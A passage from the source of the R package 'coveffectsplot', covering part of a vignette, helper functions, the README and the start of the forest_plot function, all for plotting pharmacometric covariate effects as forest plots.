#bayestestR::hdi(CLBSVdistribution$CLBSV,ci = c(.50, .90))
#0.55, 0.74, 1 , 1.12, 1.53
```
```{r,include=FALSE}
# bsvplot
# ggsave("Figure_2.png", device="png",
# type="cairo-png",width= 7, height = 5,dpi=300)
```
## Visualizing Covariate Effects with Distributions
* First, we will divide the POPCL uncertainty distribution by its median to standardize it. This will make everything relative to the reference where all covariates are held at the reference value(s) here Sex = 0 and Weight = 70 kg.
* Second, We will compute the effects of Weight = 50 kg and 90 kg as compared to the 70 kg.
We keep dSexdCL as is, it represents the effects of Sex = 1 effects when weight is held at its reference value = 70 kg.
* Third, we optionally compute the effects for combination of covariates of interest e.g. Weight = 90 kg and Sex = 1. A clinical relevance areas e.g. between 0.8 and 1.25 of the reference value is shown since this is often regarded as the zone of PK equivalence. Usually, a covariate need to have effects driving PK exposures outside of this zone to trigger actions requiring dose changes. * Finally, we will make a plot that compare the magnitude of uncertainty, covariate distribution and between subject variability effects.
```{r,fig.width= 7}
dfeffects <- df
dfeffects$REF <- dfeffects$POPCL/ median(dfeffects$POPCL)
dfeffects$SEX_FEMALE_WT_50 <- dfeffects$REF*(50/70)^dfeffects$dWTdCL
dfeffects$SEX_FEMALE_WT_90 <- dfeffects$REF*(90/70)^dfeffects$dWTdCL
dfeffects$SEX_Male_WT_70 <- dfeffects$dSexdCL
dfeffects$SEX_Male_WT_90 <- dfeffects$dSexdCL*dfeffects$REF*(90/70)^dfeffects$dWTdCL
dfeffects$BSV<- sample(CLBSVdistribution$CLBSV, nuncertainty)
dfeffects<- dfeffects[,c("SEX_FEMALE_WT_50",
"SEX_FEMALE_WT_90",
"SEX_Male_WT_70",
"SEX_Male_WT_90",
"REF",
"BSV")]
dflong <- tidyr::gather(dfeffects)
ggplot2::ggplot(dflong,ggplot2::aes(x=value,y=key,fill=factor(..quantile..)))+
ggridges::stat_density_ridges(
geom = "density_ridges_gradient", calc_ecdf = TRUE,
quantile_lines = TRUE, rel_min_height = 0.01,
quantiles = c(0.05,0.5, 0.95)) +
ggplot2::scale_fill_manual(
name = "Probability", values = c("#FF0000A0", "white","white", "#0000FFA0"),
labels = c("(0, 0.05]", "(0.05, 0.5]","(0.5, 0.95]", "(0.95, 1]")
)+
ggplot2::annotate(
"rect",
xmin = 0.8,
xmax = 1.25,
ymin = -Inf,
ymax = Inf,
fill = "gray",alpha=0.4
)+
ggplot2::geom_vline(
ggplot2::aes(xintercept = 1),
size = 1
)+
ggplot2::theme_bw()+
ggplot2::labs(x="Effects Relative to parameter reference value",y="")
```
*Here we overlay the various sources of variability to compare them head to head:*
```{r,fig.width= 7}
ggplot2::ggplot(dfeffects)+
ggplot2::geom_density(ggplot2::aes(x=REF,y=..scaled..,col="a.Uncertainty\nRSE=15%"))+
ggplot2::geom_density(data=dfcovlong,
ggplot2::aes(x=(value/70)^0.75 ,
y=..scaled..,col="b.Weight\nMean=70 kg, sd=20 kg"))+
ggplot2::geom_density(data=CLBSVdistribution ,ggplot2::aes(x=CLBSV,
y=..scaled..,col="c.Between subject variability\nCV=30%"))+
ggplot2::theme_bw(base_size = 16)+
ggplot2::theme(axis.text.y = ggplot2::element_blank(),
axis.ticks.y = ggplot2::element_blank())+
ggplot2::scale_x_continuous(breaks=c(0.25,0.5,0.8,1,1.25,1.5,2,3))+
ggplot2::coord_cartesian(xlim=c(0.25,2))+
ggplot2::labs(color="",x="Effects Standardized Relative to the Typical Value",y= "Scaled Density")
```
## Simplifying the Distributions into Ranges of Effects
The above plots might be overloading the reader with information. We will simplify it by removing unnecessary details and by computing the desired stats in advance.
```{r,}
dfeffects$SEX_Male_WT_90<- NULL
dfeffectslong<- tidyr::gather(dfeffects)
dfeffectslong<- dplyr::group_by(dfeffectslong,key)
dfeffectslongsummaries<- dplyr::summarise(dfeffectslong,mid=quantile(value,0.5),
lower=quantile(value,0.05),
upper=quantile(value,0.95))
dfeffectslongsummaries$paramname <- "CL"
dfeffectslongsummaries$covname <- c("BSV","REF","Weight","Weight","Sex")
dfeffectslongsummaries$label <- c("95% of patients","70 kg/Woman",
"50 kg/Woman", "90 kg/Woman","70 kg/Man")
dfeffectslongsummaries<- rbind(dfeffectslongsummaries,
data.frame(key=c("BSV","BSV"),
mid=c(quantile(dfeffects$BSV,0.5), quantile(dfeffects$BSV,0.5)),
lower = c(quantile(dfeffects$BSV,0.25), quantile(dfeffects$BSV,0.05)),
upper = c(quantile(dfeffects$BSV,0.75), quantile(dfeffects$BSV,0.95)),
paramname= "CL",
covname=c("BSV","BSV"),
label = c("50% of patients","90% of patients")
)
)
dfeffectslongsummaries<- dfeffectslongsummaries[c(2,6,7,3,4,5),]
plotdata <- dplyr::mutate(dfeffectslongsummaries,
LABEL = paste0(format(round(mid,2), nsmall = 2),
" [", format(round(lower,2), nsmall = 2), "-",
format(round(upper,2), nsmall = 2), "]"))
plotdata<- as.data.frame(plotdata)
plotdata<- plotdata[,c("paramname","covname","label","mid","lower","upper","LABEL")]
knitr::kable(plotdata)
```
## Plotting the Effects Data
First we do a customized `ggplot` but we quickly notice that it has some issues like the lack of legend for the clinical reference area, vertical labels etc. We then show how using `coveffectsplot::forest_plot` can generate a plot annotations, a side table with values, and legends. For interactive reordering of categories, editing of labels and more, export the data as a "csv" and launch the shiny app via `coveffectsplot::run_interactiveforestplot()`.
```{r,fig.width=7 }
plotdata$covname <- as.factor(plotdata$covname)
plotdata$covname <- reorder(plotdata$covname , c(3,4,4,2,1,1))
plotdata$label <- reorder(as.factor(plotdata$label) , c(1,3,2,4,5,6))
ggplot2::ggplot(data = plotdata, ggplot2::aes_string(
y = "label",
x = "mid",
xmin = "lower",
xmax = "upper"
)) +
ggstance::geom_pointrangeh(
position = ggstance::position_dodgev(height = 0.75),
ggplot2::aes(color = "90 %CI\nCovariate Effects"),
size = 1,
alpha = 1
)+
ggplot2::annotate("rect", xmin = min(0.8),
xmax = max(1.25), ymin = -Inf, ymax = Inf, fill = "gray",alpha=0.1)+
ggplot2::geom_vline(ggplot2::aes(xintercept = 1,linetype="Reference"))+
ggplot2::facet_grid(covname~.,scales="free_y",switch="y")+
ggplot2::labs(y="",x="Effects Relative to Reference Value",
colour="",linetype="")+
ggplot2::theme_bw()
```
```{r,dpi = 72}
png("./coveffectsplot.png",width =9 ,height = 6,units = "in",res=72)
coveffectsplot::forest_plot(plotdata,
ref_area = c(0.8, 1/0.8),
x_facet_text_size = 13,
y_facet_text_size = 13,
interval_legend_text = "Median (points)\n90% CI (horizontal lines)",
ref_legend_text = "Reference (vertical line)\n+/- 20% ratios (gray area)",
area_legend_text = "Reference (vertical line)\n+/- 20% ratios (gray area)",
xlabel = "Fold Change Relative to Parameter",
facet_formula = "covname~.",
facet_switch = "both",
facet_scales = "free",
facet_space = "fixed",
paramname_shape = TRUE,
show_table_facet_strip = "none",
table_position = "right",
table_text_size=4,
plot_table_ratio = 4,
legend_space_x_mult = 0.5,
return_list = FALSE)
dev.off()
```

Using interactive graphics with hover on-demand functionality would remove the need for a side table, this can be achieved using `plotly`. The code is included but not evaluated to keep the size of the vignette small.
```{r,fig.width=7 ,eval=FALSE}
plotdata<- plotdata[ c(3,2,1,4,5,6),]
plotly::plot_ly(plotdata) %>%
plotly::add_segments(
x = ~ round(lower, 2),
xend = ~ round(upper, 2),
y = ~ label,
yend = ~ label,
name = '90%CI',
line = list(color = plotly::toRGB("blue", alpha = 0.5), width = 5),
hoverinfo = "text",
text = ~ paste("</br> 90%CI: ",
paste(round(lower, 2), round(upper, 2)))
) %>%
plotly::add_markers(
x = ~ round(mid, 2),
y = ~ label,
name = "Median",
marker = list(
color = plotly::toRGB("black", alpha = 0.3),
size = 20,
symbol = "diamond"
),
hoverinfo = "text",
text = ~ paste("</br> Median: ",
paste(round(mid, 2)))
) %>%
plotly::layout(
xaxis = list(
title = 'Effects Relative to Reference',
ticks = "outside",
autotick = TRUE,
ticklen = 5,
gridcolor = plotly::toRGB("gray50"),
showline = TRUE
) ,
yaxis = list (
title = '' ,
autorange = TRUE,
type = "category",
categoryorder = "trace",
ticks = "outside",
autotick = TRUE,
ticklen = 5,
gridcolor = plotly::toRGB("gray50"),
showline = TRUE
),
shapes =list(
type = "rect",
x0 = 0.8,
x1 = 1.25,
xref = "x",
yref = "paper",
y0 = 0,
y1 = 1,
line = list(width = 0),
fillcolor = plotly::toRGB("black", alpha = 0.2)
)
)
```
The `return_list` option allows you to choose to return a list of ggplot objects that can be further manipulated.
```{r,dpi = 72}
png("./coveffectsplot2.png",width =9 ,height = 6,units = "in",res=72)
plotlist<- coveffectsplot::forest_plot(plotdata,
ref_area = c(0.8, 1/0.8),
x_facet_text_size = 13,
y_facet_text_size = 13,
interval_legend_text = "Median (points)\n90% CI (horizontal lines)",
ref_legend_text = "Reference\n(vertical line)\n+/- 20% ratios\n(gray area)",
area_legend_text = "Reference\n(vertical line)\n+/- 20% ratios\n(gray area)",
xlabel = "Fold Change Relative to Parameter",
facet_formula = "covname~.",
facet_switch = "both",
facet_scales = "free",
facet_space = "fixed",
paramname_shape = FALSE,
table_position = "right",
table_text_size = 4,
plot_table_ratio = 4,
show_table_facet_strip = "none",
legend_space_x_mult = 0.5,
ref_area_col = rgb( col2rgb("gray50")[1], col2rgb("gray50")[2],col2rgb("gray50")[3],
max = 255, alpha = 0.1*255 ) ,
interval_col = "steelblue",
return_list = TRUE)
egg::ggarrange(
plotlist[[1]]+
ggplot2::labs(x= expression(paste("Changes Relative to ",
CL["subscript"]^alpha["beta"], " Reference"),
sep=""))+
ggplot2::theme(strip.text.y = ggplot2::element_text(colour="blue")),
plotlist[[2]] ,
nrow = 1,
widths = c(4, 1)
)
dev.off()
```

In this introductory vignette we covered univariate covariate effects where we vary one at a time. Refer to the other vignettes for more advanced examples illustrating full simulation of PK or PK/PD or exposure-response models including the use of full covariate distributions.<file_sep>/R/run_interactiveforestplot.R
#' Run the interactiveforestplot application
#'
#' Run the \code{interactiveforestplot} application.
#' @param data optional data to load when the app is launched
#' @examples
#' if (interactive()) {
#' run_interactiveforestplot()
#' }
#' @export
run_interactiveforestplot <- function(data = NULL) {
if (!is.null(data) && !is.data.frame(data)) {
stop("data must be a data.frame", call. = FALSE)
}
appDir <- system.file("shiny", package = "coveffectsplot")
if (appDir == "") {
stop("Could not find shiny app directory. Try re-installing `coveffectsplot`.",
call. = FALSE)
}
if (!is.null(data)) {
.GlobalEnv$coveffectsplot_initdata <- data
on.exit(rm(coveffectsplot_initdata, envir = .GlobalEnv))
}
shiny::runApp(appDir, display.mode = "normal")
}
# Make CRAN happy
if (getRversion() >= "2.15.1") utils::globalVariables(c("coveffectsplot_initdata"))<file_sep>/R/get_sample_data.R
#' Get sample dataset
#'
#' Get a sample dataset that is included with the package to plot a forest plot.
#'
#' @param dataset A sample dataset file.
#'
#' @export
get_sample_data <- function(dataset = "dfall.csv") {
data_dir <- system.file("sample_data", package = "coveffectsplot")
if (data_dir == "") {
stop("Could not find data directory. Try re-installing `coveffectsplot`.",
call. = FALSE)
}
data_files <- list.files(data_dir)
if (!dataset %in% data_files) {
stop("Data file does not exit. Possible files: ",
paste(data_files, collapse = ", "),
call. = FALSE)
}
utils::read.csv(file.path(data_dir, dataset))
}
<file_sep>/README.md
coveffectsplot
========

[](https://travis-ci.org/smouksassi/coveffectsplot)

A package that provide the function `forest_plot`and an accompanying Shiny App that facilitates the production of forest plots to visualize covariate effects as commonly used in pharmacometrics population PK/PD reports.
### Installation and Running information
```
# Install from CRAN:
install.packages("coveffectsplot")
# Or the development version from GitHub:
#install.packages("devtools")
devtools::install_github('smouksassi/coveffectsplot')
```
Launch the app using this command then press the use sample data blue text to load the app with a demo data:
```
coveffectsplot::run_interactiveforestplot()
```
This will generate this plot:

### Expected data
Several example data are provided to illustrate the various functionality but the goal is that you simulate, compute and bring your own data. The app will help you, using point and click interactions, to design a plot that communicates your model covariate effects.
The data that is loaded to the app should have at a minimum the following columns with the exact names:
* paramname: Parameter on which the effects are shown e.g. CL, Cmax, AUC etc.
* covname: Covariate name that the effects belong to e.g. Weight, SEX, Dose etc.
* label: Covariate value that the effects of which is shown e.g. 50 kg, 50 kg\90 kg (here the reference value is contained in the label).
* mid: Middle value for the effects usually the median from the uncertainty distribution.
* lower: Lower value for the effects usually the 2.5% or 5% from the uncertainty distribution.
* upper: Upper value for the effects usually the 97.5% or 95% from the uncertainty distribution.
You might also choose to have a covname with value All (or other appropriate value) to illustrate and show the uncertainty on the reference value in a separate facet.
Additionally, you might want to have a covname with value BSV to illustrate and show the the between subject variability (BSV) spread.
The example data show where does 90 and 50% of the patients will be based on the model BSV estimate for the selected paramname(s).

The vignette [Introduction to coveffectsplot](https://cran.r-project.org/package=coveffectsplot/vignettes/introduction_to_coveffectsplot.html) will walk you through the background and how to compute and build the required data that the shiny app or the function `forest_plot`expects. There is some data management steps that the app does automatically. Choosing to call the function will require you to build the table LABEL and to control the ordering of the variables. The `forest_plot` help has several examples.
The package also include vignettes with several step-by-step detailed examples:
<a href="https://cran.r-project.org/package=coveffectsplot/vignettes/PK_Example.html">PK example</a>
<a href="https://cran.r-project.org/package=coveffectsplot/vignettes/Pediatric_Cov_Sim.html">Pediatric example</a>
<a href="https://cran.r-project.org/package=coveffectsplot/vignettes/PKPD_Example.html">PK PD example</a>
<a href="https://cran.r-project.org/package=coveffectsplot/vignettes/Exposure_Response_Example.html">Exposure Response</a>
### Example using a real drug label data
The prezista drug label data was extracted from the FDA label and calling the `forest_plot` function gives:
```
library(coveffectsplot)
plotdata <- dplyr::mutate(prezista,
LABEL = paste0(format(round(mid,2), nsmall = 2),
" [", format(round(lower,2), nsmall = 2), "-",
format(round(upper,2), nsmall = 2), "]"))
plotdata<- as.data.frame(plotdata)
plotdata<- plotdata[,c("paramname","covname","label","mid","lower","upper","LABEL")]
plotdata$covname <- factor(plotdata$covname)
levels(plotdata$covname) <- c ("Other\nAntiretrovirals","Protease\nInihibitors")
#png("prezista.png",width =12 ,height = 8,units = "in",res=72,type="cairo-png")
coveffectsplot::forest_plot(plotdata,
ref_area = c(0.5, 1.5),
base_size = 16 ,
x_facet_text_size = 13,
y_facet_text_size = 16,
y_facet_text_angle = 270,
interval_legend_text = "Median (points)\n90% CI (horizontal lines)",
ref_legend_text = "Reference (vertical line)\n+/- 50% (gray area)",
area_legend_text = "Reference (vertical line)\n+/- 50% (gray area)",
xlabel = "Median 90%CI Fold Change Relative to Parameter",
facet_formula = "covname~.",
facet_switch = "both",
facet_scales = "free",
facet_space = "free",
strip_placement = "outside",
paramname_shape = TRUE,
table_position = "right",
table_text_size = 4,
plot_table_ratio = 4,
vertical_dodge_height = 0.8,
legend_space_x_mult = 0.1,
legend_order = c("shape","pointinterval","ref", "area"),
legend_shape_reverse = TRUE,
show_table_facet_strip = "none",
return_list = FALSE)
#dev.off()
```

<file_sep>/R/forest_plot.R
# Same as base R `which()` function, but return 0 instead of an empty vector
# if there are no TRUE values in the array
which0 <- function(x) {
result <- which(x)
if (length(result) == 0) {
result <- 0
}
result
}
#' Forest plot
#'
#' Produce forest plots to visualize covariate effects
#'
#' @param data Data to use.
#' @param facet_formula Facet formula.
#' @param xlabel X axis title.
#' @param ylabel Y axis title.
#' @param x_facet_text_size Facet text size X.
#' @param y_facet_text_size Facet text size Y.
#' @param x_facet_text_angle Facet text angle X.
#' @param y_facet_text_angle Facet text angle Y.
#' @param x_facet_text_vjust Facet text vertical justification.
#' @param y_facet_text_vjust Facet text vertical justification.
#' @param x_facet_text_hjust Facet text horizontal justification.
#' @param y_facet_text_hjust Facet text horizontal justification.
#' @param xy_facet_text_bold Bold Facet text. Logical TRUE FALSE.
#' @param x_label_text_size X axis labels size.
#' @param y_label_text_size Y axis labels size.
#' @param table_text_size Table text size.
#' @param base_size theme_bw base_size for the plot and table.
#' @param theme_benrich apply Benjamin Rich's theming.
#' @param table_title with theme_benrich on what text to use for table title.
#' @param table_title_size table title size.
#' @param ref_legend_text Reference legend text.
#' @param area_legend_text Area legend text.
#' @param interval_legend_text Pointinterval Legend text.
#' @param legend_order Legend order. A four-element vector with the following
#' items ordered in your desired order: "pointinterval", "ref", "area", "shape".
#' if an item is absent the legend will be omitted.
#' @param combine_area_ref_legend Combine reference and area legends if they
#' share the same text?
#' @param legend_position where to put the legend: "top", "bottom","right","none"
#' @param show_ref_area Show reference window?
#' @param ref_area Reference area. Two-element numeric vector multiplying the ref_value.
#' @param show_ref_value Show reference line?
#' @param ref_value X intercept of reference line.
#' @param ref_area_col Reference area background color.
#' @param ref_value_col Reference line color.
#' @param interval_col Point range color. One value.
#' @param bsv_col BSV pointinterval color. One value.
#' @param interval_bsv_text BSV legend text.
#' @param strip_col Strip background color.
#' @param paramname_shape Map symbol to parameter(s)?
#' @param legend_shape_reverse TRUE or FALSE.
#' @param facet_switch Facet switch to near axis. Possible values: "both", "y",
#' "x", "none".
#' @param facet_scales Facet scales. Possible values: "free_y", "fixed",
#' "free_x", "free".
#' @param facet_space Facet spaces. Possible values: "fixed", "free_x",
#' "free_y", "free".
#' @param facet_labeller Facet Labeller. Default "label_value"
#' any other valid `facet_grid` labeller can be specified.
#' @param strip_placement Strip placement. Possible values: "inside", "outside".
#' @param strip_outline Draw rectangle around the Strip. Logical TRUE FALSE.
#' @param facet_spacing Control the space between facets in points.
#' @param major_x_ticks X axis major ticks. Numeric vector.
#' @param minor_x_ticks X axis minor ticks. Numeric vector.
#' @param x_range Range of X values. Two-element numeric vector.
#' @param logxscale X axis log scale. Logical TRUE FALSE.
#' @param show_yaxis_gridlines Draw the y axis gridlines. Logical TRUE FALSE.
#' @param show_xaxis_gridlines Draw the x axis gridlines. Logical TRUE FALSE.
#' @param show_table_facet_strip Possible values: "none", "both", "y", "x".
#' @param table_facet_switch Table facet switch to near axis. Possible values: "both", "y",
#' "x", "none".
#' @param show_table_yaxis_tick_label Show table y axis ticks and labels?
#' @param reserve_table_xaxis_label_space keep space for the x axis label to keep alignment.
#' @param table_panel_border Draw the panel border for the table. Logical TRUE FALSE.
#' @param table_position Table position. Possible values: "right", "below", "none".
#' @param plot_table_ratio Plot-to-table ratio. Suggested value between 1-5.
#' @param vertical_dodge_height Amount of vertical dodging to apply on segments and table text.
#' @param legend_space_x_mult Multiplier to adjust the spacing between legend items.
#' @param legend_ncol_interval Control the number of columns for the pointinterval legend.
#' @param legend_ncol_shape Control the number of columns for the shape legend.
#' @param plot_margin Control the white space around the main plot. Vector of four numeric values
#' for the top, right, bottom and left sides.
#' @param table_margin Control the white space around the table. Vector of four numeric values
#' for the top, right, bottom and left sides.
#' @param legend_margin Control the white space around the plot legend. Vector of four numeric values
#' for the top, right, bottom and left sides.
#' @param parse_xlabel treat xlabel as an expression. Logical FALSE TRUE.
#' @param parse_ylabel treat ylabel as an expression. Logical FALSE TRUE.
#' @param return_list What to return if True a list of the main and table plots is returned
#' instead of the gtable/plot.
#' @rawNamespace import(data.table, except = c(last,between,first))
#' @examples
#' library(dplyr)
#'
#' # Example 1
#'
#' plotdata <- get_sample_data("forest-plot-table.csv")
#' plotdata <- plotdata %>%
#' mutate(midlabel = format(round(mid,2), nsmall = 2),
#' lowerlabel = format(round(lower,2), nsmall = 2),
#' upperlabel = format(round(upper,2), nsmall = 2),
#' LABEL = paste0(midlabel, " [", lowerlabel, "-", upperlabel, "]"))
#' param <- "BZD AUC"
#' plotdata <- filter(plotdata,paramname==param)
#' plotdata$covname <- reorder(plotdata$covname,plotdata$upper,FUN =max)
#' plotdata$label <- reorder(plotdata$label,plotdata$scen)
#' covs <- c("WEIGHT","AGE")
#' plotdata <- filter(plotdata,covname%in%covs)
#' forest_plot(plotdata,
#' ref_legend_text = "Reference (vertical line)",
#' area_legend_text = "Reference (vertical line)",
#' xlabel = paste("Fold Change in", param, "Relative to Reference"),
#' logxscale = TRUE, major_x_ticks =c(0.1,1,1.5),
#' show_ref_area = FALSE,
#' facet_formula = "covname~.",
#' facet_scales = "free_y",
#' facet_space = "free_y",
#' show_table_facet_strip = "none",
#' table_position = "right",
#' plot_table_ratio = 4)
#'
#' # Example 2
#'
#' plotdata <- get_sample_data("forest-plot-table.csv")
#' plotdata <- plotdata %>%
#' mutate(midlabel = format(round(mid,2), nsmall = 2),
#' lowerlabel = format(round(lower,2), nsmall = 2),
#' upperlabel = format(round(upper,2), nsmall = 2),
#' LABEL = paste0(midlabel, " [", lowerlabel, "-", upperlabel, "]"))
#' param <- c("BZD AUC","BZD Cmax")
#' plotdata <- filter(plotdata,paramname%in%param)
#' plotdata <- filter(plotdata,covname%in%"WEIGHT")
#' plotdata$covname <- reorder(plotdata$covname,plotdata$upper,FUN =max)
#' plotdata$label <- reorder(plotdata$label,plotdata$scen)
#' forest_plot(plotdata,
#' ref_legend_text = "Reference (vertical line)",
#' area_legend_text = "Reference (vertical line)",
#' xlabel = paste("Fold Change of Parameter", "Relative to Reference"),
#' show_ref_area = FALSE,
#' facet_formula = "covname~paramname",
#' facet_scales = "free_y",
#' facet_space = "free_y",
#' x_facet_text_size = 10,
#' y_facet_text_size = 10,
#' y_label_text_size = 10,
#' x_label_text_size = 10,
#' facet_switch = "both",
#' show_table_facet_strip = "both",
#' show_table_yaxis_tick_label = TRUE,
#' table_position = "below",
#' plot_table_ratio = 1)
#'\dontrun{
#' # Example 3
#'
#' plotdata <- get_sample_data("forestplotdatacpidata.csv")
#' forest_plot(plotdata,
#' ref_area = c(0.8, 1.2),
#' x_facet_text_size = 12,
#' y_facet_text_size = 12,
#' y_label_text_size = 10,
#' x_label_text_size = 10,
#' table_text_size = 6,
#' plot_table_ratio = 1.5,
#' ref_legend_text = "Reference (vertical line)\n+/- 20% limits (colored area)",
#' area_legend_text = "Reference (vertical line)\n+/- 20% limits (colored area)",
#' xlabel = "Fold Change Relative to RHZE",
#' facet_formula = "covname~paramname",
#' table_position = "below",
#' show_table_facet_strip = "both",
#' show_table_yaxis_tick_label = TRUE)
#'
#' # Example 4
#' plotdata <- get_sample_data("dataforest.csv")
#' plotdata <- plotdata %>%
#' mutate(midlabel = format(round(mid,2), nsmall = 2),
#' lowerlabel = format(round(lower,2), nsmall = 2),
#' upperlabel = format(round(upper,2), nsmall = 2),
#' LABEL = paste0(midlabel, " [", lowerlabel, "-", upperlabel, "]"))
#' plotdata <- plotdata %>%
#' filter(covname%in%c("Weight"))
#' plotdata$label <- as.factor(as.character(plotdata$label))
#' plotdata$label <- factor(plotdata$label, c("36.2 kg","66 kg","110 kg"))
#' forest_plot(plotdata,
#' ref_area = c(0.8, 1.2),
#' x_facet_text_size = 13,
#' y_facet_text_size = 13,
#' ref_legend_text = "Reference (vertical line)\n+/- 20% limits (colored area)",
#' area_legend_text = "Reference (vertical line)\n+/- 20% limits (colored area)",
#' xlabel = "Fold Change Relative to Parameter",
#' facet_formula = "covname~paramname",
#' facet_switch = "both",
#' facet_scales = "free",
#' facet_space = "fixed",
#' table_position = "below",
#' plot_table_ratio = 1,
#' show_table_facet_strip = "both",
#' show_table_yaxis_tick_label = TRUE)
#'
#' # Example 5
#'
#' forest_plot(plotdata,
#' ref_area = c(0.8, 1.2),
#' x_facet_text_size = 13,
#' y_facet_text_size = 13,
#' ref_legend_text = "Reference (vertical line)\n+/- 20% limits (colored area)",
#' area_legend_text = "Reference (vertical line)\n+/- 20% limits (colored area)",
#' xlabel = "Fold Change Relative to Parameter",
#' facet_formula = "covname~.",
#' facet_switch = "both",
#' facet_scales = "free",
#' facet_space = "fixed",
#' paramname_shape = TRUE,
#' table_position = "none",
#' ref_area_col = rgb( col2rgb("gray50")[1], col2rgb("gray50")[2],col2rgb("gray50")[3],
#' max = 255, alpha = 0.1*255 ) ,
#' interval_col = "steelblue",
#' strip_col = "lightblue",
#' plot_table_ratio = 1)
#'}
#' @export
forest_plot <- function(
data,
facet_formula = "covname~paramname",
xlabel = "",
ylabel = "",
x_facet_text_size = 13,
y_facet_text_size = 13,
x_facet_text_angle = 0,
y_facet_text_angle = 180,
x_facet_text_vjust = 0.5,
y_facet_text_vjust = 0.5,
x_facet_text_hjust = 0.5,
y_facet_text_hjust = 0.5,
xy_facet_text_bold = TRUE,
x_label_text_size = 16,
y_label_text_size = 16,
table_text_size = 7,
base_size = 22,
theme_benrich = FALSE,
table_title = "",
table_title_size = 15,
ref_legend_text = "",
area_legend_text = "",
interval_legend_text = "",
legend_order = c("pointinterval", "ref", "area", "shape"),
combine_area_ref_legend = TRUE,
legend_position = "top",
show_ref_area = TRUE,
ref_area = c(0.8, 1.25),
show_ref_value = TRUE,
ref_value = 1,
ref_area_col = "#BEBEBE50",
ref_value_col = "black",
interval_col = "blue",
bsv_col = "red",
interval_bsv_text = "",
strip_col = "#E5E5E5",
paramname_shape = FALSE,
legend_shape_reverse = FALSE,
facet_switch = c("both", "y", "x", "none"),
facet_scales = c("fixed", "free_y", "free_x", "free"),
facet_space = c("fixed", "free_x", "free_y", "free"),
facet_labeller = "label_value",
strip_placement = c("inside", "outside"),
strip_outline = TRUE,
facet_spacing = 5.5,
major_x_ticks = NULL,
minor_x_ticks = NULL,
x_range = NULL,
logxscale = FALSE,
show_yaxis_gridlines = TRUE,
show_xaxis_gridlines = TRUE,
show_table_facet_strip = "none",
table_facet_switch = c("both", "y", "x", "none"),
show_table_yaxis_tick_label = FALSE,
reserve_table_xaxis_label_space = TRUE,
table_panel_border = TRUE,
table_position = c("right", "below", "none"),
plot_table_ratio = 4,
vertical_dodge_height = 0.8,
legend_space_x_mult = 1,
legend_ncol_interval = 1,
legend_ncol_shape = 1,
plot_margin = c(5.5, 5.5, 5.5, 5.5),
table_margin = c(5.5, 5.5, 5.5, 5.5),
legend_margin = c(0, 0.1, -0.1, 0),
parse_xlabel = FALSE,
parse_ylabel = FALSE,
return_list = FALSE)
{
ymax = ymin = x = fill = NULL
plot_margin[ which(is.na(plot_margin) ) ] <- 0
table_margin[ which(is.na(table_margin) ) ] <- 0
legend_margin[ which(is.na(legend_margin) ) ] <- 0
facet_spacing[ which(is.na(facet_spacing) ) ] <- 0
table_position <- match.arg(table_position)
legend_order <- match.arg(legend_order, several.ok = TRUE)
facet_switch <- match.arg(facet_switch)
table_facet_switch <- match.arg(table_facet_switch)
facet_scales <- match.arg(facet_scales)
facet_space <- match.arg(facet_space)
strip_placement <- match.arg(strip_placement)
facet_formula <- stats::as.formula(facet_formula)
y_facet_text_angle<- ifelse(facet_switch %in% c("x","none"),
y_facet_text_angle-180,
y_facet_text_angle)
if (x_facet_text_size <= 0) {
x.strip.text <- ggplot2::element_blank()
table.x.strip.text <- x.strip.text
} else {
x.strip.text <- ggplot2::element_text(size = x_facet_text_size,
angle= x_facet_text_angle,
face = ifelse(xy_facet_text_bold,"bold","plain"),
hjust = x_facet_text_hjust,
vjust = x_facet_text_vjust
)
table.x.strip.text <- x.strip.text
}
if (y_facet_text_size <= 0) {
y.strip.text <- ggplot2::element_blank()
table.y.strip.text <- y.strip.text
} else {
y.strip.text <- ggplot2::element_text(size = y_facet_text_size,
angle= y_facet_text_angle,
face = ifelse(xy_facet_text_bold,"bold","plain"),
hjust = y_facet_text_hjust,
vjust = y_facet_text_vjust
)
table.y.strip.text <- y.strip.text
}
if (theme_benrich && y_facet_text_size >0){
y.strip.text <- ggplot2::element_text(
hjust=1,
vjust=1,
face="bold",
size=y_facet_text_size,
angle= y_facet_text_angle
)
table.y.strip.text <- ggplot2::element_text(
hjust=1,
vjust=1,
face="bold",
size=y_facet_text_size,
angle= y_facet_text_angle
)
}
if ( !is.expression(xlabel) && xlabel == "" ) {
xlabel <- paste("Changes of Parameter Relative to Reference")
}
if ( !is.expression(xlabel) && parse_xlabel) {
xlabel <- parse(text=xlabel)
}
if ( !is.expression(ylabel) && parse_ylabel) {
ylabel <- parse(text=ylabel)
}
if (table_title == "") {
table_title <- "Median [95% CI]"
}
if (ref_legend_text == "") {
ref_legend_text <- "Reference (vertical line)\nClinically relevant limits (colored area)"
}
if (area_legend_text == "") {
area_legend_text <- "Reference (vertical line)\nClinically relevant limits (colored area)"
}
if (interval_legend_text == "") {
interval_legend_text <- "Median (points)\n95% CI (horizontal lines)"
}
if (interval_bsv_text == "") {
interval_bsv_text <- "BSV (points)\nPrediction Intervals (horizontal lines)"
}
interval_pos <- which0(legend_order == "pointinterval")[1]
fill_pos <- which0(legend_order == "area")[1]
linetype_pos <- which0(legend_order == "ref")[1]
shape_pos <- which0(legend_order == "shape")[1]
if (combine_area_ref_legend) {
fill_pos <- linetype_pos
}
guide_interval <- ggplot2::guide_legend("", order = interval_pos,
ncol = legend_ncol_interval)
guide_fill <- ggplot2::guide_legend("", order = fill_pos)
guide_linetype <- ggplot2::guide_legend("", order = linetype_pos)
guide_shape <- ggplot2::guide_legend("", order = shape_pos,
override.aes = list(linetype = 0,
colour = "gray"),
reverse = legend_shape_reverse,
ncol = legend_ncol_shape)
if( interval_pos==0) guide_interval = FALSE
if( fill_pos==0) guide_fill = FALSE
if( linetype_pos==0) guide_linetype = FALSE
if( shape_pos==0) guide_shape = FALSE
data$label <- factor(data$label)
data$pointintervalcolor <- ifelse( !data$covname%in%
c("BSV","bsv","IIV","Bsv"),
interval_legend_text,
interval_bsv_text)
data$pointintervalcolor <- factor(data$pointintervalcolor,
levels =c(interval_legend_text,
interval_bsv_text)[!duplicated(c(interval_legend_text,
interval_bsv_text))]
)
colbreakvalues<- c(interval_legend_text, interval_bsv_text)
main_plot <-
ggplot2::ggplot(data = data, ggplot2::aes_string(
y = "label",
x = "mid",
xmin = "lower",
xmax = "upper"
)) +
ggstance::geom_pointrangeh(
position = ggstance::position_dodgev(height = vertical_dodge_height),
ggplot2::aes_string(color = "pointintervalcolor"),
size = 1,
alpha = 0
)# dummy to prevent a scales bug that I reported to ggplot2 maintainers
if (show_ref_area) {
main_plot <- main_plot +
